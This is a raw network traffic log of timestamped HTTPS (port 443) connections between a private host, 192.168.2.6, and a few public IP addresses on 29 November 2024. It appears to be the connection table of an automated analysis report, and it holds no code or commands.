                                                                                                                                                                                    Nov 29, 2024 19:50:00.889055967 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.913207054 CET49796443192.168.2.6172.217.21.36
                                                                                                                                                                                    Nov 29, 2024 19:50:00.913225889 CET44349796172.217.21.36192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.006819010 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.019396067 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:01.019428015 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.207921982 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.210825920 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:01.210850954 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.328525066 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.375807047 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:01.375828981 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.379249096 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:01.379264116 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.408905983 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.411448002 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:01.411473036 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:01.411482096 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.529649973 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.535006046 CET4434982352.149.20.212192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.535120964 CET49823443192.168.2.652.149.20.212
                                                                                                                                                                                    Nov 29, 2024 19:50:01.537039995 CET49823443192.168.2.652.149.20.212
                                                                                                                                                                                    Nov 29, 2024 19:50:01.537048101 CET4434982352.149.20.212192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.537291050 CET4434982352.149.20.212192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.537823915 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:01.547064066 CET49823443192.168.2.652.149.20.212
                                                                                                                                                                                    Nov 29, 2024 19:50:01.579334021 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.591339111 CET4434982352.149.20.212192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.656949043 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.660516024 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:01.660542965 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.730667114 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.733444929 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:01.733473063 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.825259924 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.871109009 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:01.871128082 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.874602079 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:01.874614954 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:01.874680996 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:01.874686003 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.025917053 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.031428099 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:02.031443119 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.144264936 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.190898895 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:02.190910101 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.195233107 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:02.195245028 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.195827007 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:02.195832968 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.254895926 CET4434982352.149.20.212192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.254921913 CET4434982352.149.20.212192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.254939079 CET4434982352.149.20.212192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.255122900 CET49823443192.168.2.652.149.20.212
                                                                                                                                                                                    Nov 29, 2024 19:50:02.255139112 CET4434982352.149.20.212192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.255238056 CET49823443192.168.2.652.149.20.212
                                                                                                                                                                                    Nov 29, 2024 19:50:02.264616013 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.270824909 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:02.270850897 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.272701979 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:02.295022964 CET4434982352.149.20.212192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.295111895 CET4434982352.149.20.212192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.295125961 CET4434982352.149.20.212192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.295161963 CET49823443192.168.2.652.149.20.212
                                                                                                                                                                                    Nov 29, 2024 19:50:02.295161963 CET49823443192.168.2.652.149.20.212
                                                                                                                                                                                    Nov 29, 2024 19:50:02.295180082 CET49823443192.168.2.652.149.20.212
                                                                                                                                                                                    Nov 29, 2024 19:50:02.295268059 CET49823443192.168.2.652.149.20.212
                                                                                                                                                                                    Nov 29, 2024 19:50:02.295285940 CET4434982352.149.20.212192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.295345068 CET49823443192.168.2.652.149.20.212
                                                                                                                                                                                    Nov 29, 2024 19:50:02.295352936 CET4434982352.149.20.212192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.315335035 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.465639114 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.482072115 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:02.482144117 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.636984110 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.640949011 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.641016006 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:02.641033888 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.646272898 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:02.646301985 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.650530100 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:02.650660992 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.712826967 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.716348886 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:02.716387987 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.717674017 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:02.717696905 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.837881088 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:02.841217995 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:02.841254950 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:03.039155960 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:03.086369038 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:03.132580042 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:03.182348967 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:03.182357073 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:03.232681036 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:03.240289927 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:03.291198969 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:03.333784103 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:03.374694109 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:03.717844009 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:03.717875004 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:03.719198942 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:03.719211102 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:03.721858025 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:03.721870899 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:03.723861933 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:03.723871946 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:03.724411964 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:03.724416971 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.041820049 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.046166897 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:04.046197891 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.163001060 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.166327953 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.166372061 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:04.166390896 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.170233965 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:04.170254946 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.171123028 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:04.171911001 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:04.171927929 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.174232006 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:04.215339899 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.296646118 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:04.296701908 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.296781063 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:04.298326015 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:04.298348904 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.371201992 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.374341965 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:04.374366999 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.498414993 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.578387022 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:04.578412056 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.582674026 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:04.582699060 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.612938881 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.615922928 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:04.616002083 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:04.616019011 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.699376106 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.702112913 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:04.743329048 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.856683969 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:04.865854979 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:04.865884066 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.024009943 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.026679993 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:05.026721001 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.027422905 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.100752115 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.100805044 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:05.100827932 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.104804993 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:05.104888916 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:05.104927063 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.105520010 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:05.151335001 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.225263119 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.228266954 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:05.228311062 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.426361084 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.429318905 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:05.429356098 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.513068914 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.579389095 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:05.579430103 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.582487106 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:05.582519054 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.627471924 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.632463932 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:05.632504940 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.632548094 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:05.632570982 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.714055061 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.734353065 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:05.734392881 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.868777037 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.872375011 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:05.872415066 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.915150881 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:05.919142962 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:05.919188023 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.027823925 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.031652927 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:06.031687975 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.036468029 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:06.083349943 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.228842974 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.270170927 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:06.270190001 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.308104038 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.365077019 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:06.365098953 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.370146036 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:06.370155096 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.425875902 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.429486990 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.429528952 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:06.429536104 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.430349112 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:06.430356026 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.434412956 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:06.434417009 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.434936047 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:06.434940100 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.578074932 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.578198910 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:06.581263065 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:06.581269979 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.581536055 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.583292961 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:06.583364964 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:06.583369017 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.583522081 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:06.627185106 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.627322912 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.631678104 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:06.631692886 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.750379086 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.797537088 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:06.797575951 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.805392027 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:06.805433989 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.916874886 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.919439077 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.919495106 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:06.919526100 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.925612926 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:06.925647974 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.927505970 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:06.927522898 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.927546024 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.969233990 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:06.969263077 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:06.974759102 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:07.019330025 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.117916107 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.166085005 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:07.166101933 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.169425964 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:07.169440031 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.256681919 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.256973028 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.257149935 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:07.257172108 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.257184982 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:07.257193089 CET4434984120.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.257201910 CET49841443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:07.316901922 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.319840908 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.319896936 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:07.319916964 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.320632935 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:07.320641994 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.322494030 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:07.322501898 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.490895033 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.493944883 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:07.493978977 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.494005919 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:07.494009972 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.642127991 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.645919085 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:07.645951986 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.691926003 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.735961914 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:07.843336105 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:07.891516924 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:08.105839968 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:08.127264977 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:08.127428055 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:08.127465010 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:08.172668934 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:33.126769066 CET49889443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:33.126813889 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:33.126910925 CET49889443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:33.128094912 CET49889443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:33.128117085 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:35.344306946 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:35.344454050 CET49889443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:35.346565962 CET49889443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:35.346574068 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:35.346822977 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:35.348467112 CET49889443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:35.348520994 CET49889443192.168.2.620.198.119.143
                                                                                                                                                                                    Nov 29, 2024 19:50:35.348531008 CET4434988920.198.119.143192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:35.348679066 CET49889443192.168.2.620.198.119.143
